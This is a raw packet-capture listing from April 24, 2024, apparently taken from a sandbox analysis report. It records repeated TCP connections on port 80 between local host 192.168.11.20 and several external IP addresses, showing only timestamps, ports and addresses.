                                                                    Apr 24, 2024 12:31:18.370758057 CEST5028680192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:18.535662889 CEST8050286173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:18.536052942 CEST5028680192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:18.539649010 CEST5028680192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:18.704514980 CEST8050286173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:18.704612017 CEST8050286173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:18.704622030 CEST8050286173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:18.704741001 CEST5028680192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:20.042871952 CEST5028680192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:21.060302973 CEST5028780192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:21.225353003 CEST8050287173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:21.225486040 CEST5028780192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:21.226902962 CEST5028780192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:21.391962051 CEST8050287173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:21.392082930 CEST8050287173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:21.392092943 CEST8050287173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:21.392278910 CEST5028780192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:22.729715109 CEST5028780192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:23.747246027 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:23.912195921 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:23.912333012 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:23.915170908 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:23.915194035 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:23.915277958 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.080358028 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.080440044 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.080482960 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.080526114 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.080565929 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.080570936 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.080741882 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.080741882 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.080946922 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.246047020 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246110916 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246283054 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246284008 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.246443987 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246459007 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.246495008 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246632099 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:24.246676922 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246804953 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246845961 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.246884108 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.411562920 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.411874056 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.411993027 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.412189007 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.412367105 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.412497997 CEST8050288173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:24.412659883 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:25.416663885 CEST5028880192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.434297085 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.599287987 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.599458933 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.600867033 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.765803099 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.765889883 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.765898943 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:26.766144991 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.768116951 CEST5028980192.168.11.20173.232.100.113
                                                                    Apr 24, 2024 12:31:26.932986975 CEST8050289173.232.100.113192.168.11.20
                                                                    Apr 24, 2024 12:31:34.823193073 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.123769045 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.123999119 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.125386953 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.425863028 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.428301096 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.428380966 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:35.428595066 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.430459023 CEST5029080192.168.11.2051.77.215.151
                                                                    Apr 24, 2024 12:31:35.730806112 CEST805029051.77.215.151192.168.11.20
                                                                    Apr 24, 2024 12:31:40.446736097 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:40.757066965 CEST805029164.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:40.757256031 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:40.758810997 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:41.069983959 CEST805029164.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:41.069997072 CEST805029164.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:41.070164919 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:42.272332907 CEST5029180192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.289854050 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.600075960 CEST805029264.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:43.600215912 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.601685047 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:43.912746906 CEST805029264.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:43.912760973 CEST805029264.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:43.912904978 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:45.115446091 CEST5029280192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.132962942 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.443185091 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.443341970 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.445893049 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.445915937 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.445993900 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756078005 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756159067 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756169081 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756297112 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756302118 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756412983 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756421089 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.756470919 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756639957 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.756810904 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:46.757061958 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:46.802485943 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.060930967 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061136007 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.061291933 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.061372042 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061382055 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061415911 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061546087 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.061577082 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061682940 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.061717033 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.365963936 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366067886 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366189957 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366323948 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366451025 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366462946 CEST805029364.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:47.366600990 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:47.958540916 CEST5029380192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:48.976080894 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.280709028 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.280986071 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.282418013 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.618956089 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.618972063 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.618995905 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619097948 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619112015 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619131088 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619143009 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619251013 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619256020 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.619266987 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619278908 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.619332075 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.619416952 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.619492054 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.929543972 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929665089 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929677963 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929706097 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929727077 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929748058 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929761887 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929775953 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:31:49.929924965 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.930083990 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:49.931988955 CEST5029480192.168.11.2064.190.62.22
                                                                    Apr 24, 2024 12:31:50.242129087 CEST805029464.190.62.22192.168.11.20
                                                                    Apr 24, 2024 12:32:11.393058062 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:11.567780018 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.567962885 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:11.569351912 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:11.744616032 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744729042 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744740009 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744750023 CEST8050295108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:11.744895935 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:13.078047991 CEST5029580192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.095520973 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.270433903 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.270678997 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.272114992 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:14.447753906 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.447904110 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.447916031 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.447926044 CEST8050296108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:14.448153973 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:15.780560017 CEST5029680192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.798154116 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.972309113 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:16.972537994 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.975297928 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.975320101 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:16.975368023 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.149499893 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.149646997 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.149776936 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.149863005 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.150012016 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.150158882 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150166988 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.150257111 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150265932 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150274992 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.150536060 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324089050 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324234009 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324310064 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324371099 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324481010 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324570894 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324595928 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.324732065 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.324791908 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:17.498445034 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.498617887 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.498821020 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.498913050 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:17.499036074 CEST8050297108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:18.483103991 CEST5029780192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.500590086 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.669699907 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.669893026 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.671590090 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.841404915 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.841505051 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.841517925 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:19.841677904 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:19.844926119 CEST5029880192.168.11.20108.186.8.155
                                                                    Apr 24, 2024 12:32:20.013753891 CEST8050298108.186.8.155192.168.11.20
                                                                    Apr 24, 2024 12:32:24.859260082 CEST5029980192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:25.194149971 CEST805029984.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:25.194360971 CEST5029980192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:25.195786953 CEST5029980192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:25.530596018 CEST805029984.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:25.530759096 CEST805029984.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:27.717546940 CEST5030080192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:28.050009966 CEST805030084.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:28.050179958 CEST5030080192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:28.051613092 CEST5030080192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:28.384125948 CEST805030084.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:28.384139061 CEST805030084.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:30.576320887 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.913392067 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:30.913574934 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.916127920 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.916146040 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:30.916199923 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:31.253810883 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:31.253992081 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:31.254024029 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:31.254139900 CEST5030180192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:31.254182100 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:31.591907024 CEST805030184.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:33.435079098 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:33.769854069 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:33.770071030 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:33.771473885 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.106252909 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106499910 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106559038 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106703043 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106739044 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106765985 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106792927 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106822968 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106827974 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.106865883 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106884956 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.106899977 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:34.106950998 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.107108116 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.110517979 CEST5030280192.168.11.2084.32.84.32
                                                                    Apr 24, 2024 12:32:34.445257902 CEST805030284.32.84.32192.168.11.20
                                                                    Apr 24, 2024 12:32:39.121406078 CEST5030380192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:39.400122881 CEST8050303118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:39.400329113 CEST5030380192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:39.401813984 CEST5030380192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:39.680488110 CEST8050303118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:39.681875944 CEST8050303118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:39.681889057 CEST8050303118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:39.682082891 CEST5030380192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:40.915635109 CEST5030380192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:41.933162928 CEST5030480192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:42.211982012 CEST8050304118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:42.212214947 CEST5030480192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:42.213643074 CEST5030480192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:42.483347893 CEST8050304118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:42.484846115 CEST8050304118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:42.484858036 CEST8050304118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:42.485140085 CEST5030480192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:42.490880013 CEST8050304118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:43.727546930 CEST5030480192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:44.745280027 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.024390936 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.024615049 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.027126074 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.027204990 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.027257919 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.306124926 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.306212902 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.306303978 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.306349993 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.306359053 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.306449890 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.306456089 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.306478977 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.306644917 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.306813002 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.585356951 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585495949 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585517883 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.585625887 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585633993 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585692883 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.585737944 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585828066 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585835934 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585894108 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.585941076 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.585962057 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.586035967 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:45.586093903 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.586102009 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.586111069 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.586256981 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.586324930 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.864552021 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.864660025 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.864764929 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.864773035 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.865009069 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.865112066 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.865123034 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.865284920 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.865293026 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.866132975 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.866226912 CEST8050305118.27.122.214192.168.11.20
                                                                    Apr 24, 2024 12:32:45.866391897 CEST5030580192.168.11.20118.27.122.214
                                                                    Apr 24, 2024 12:32:46.539433002 CEST5030580192.168.11.20118.27.122.214
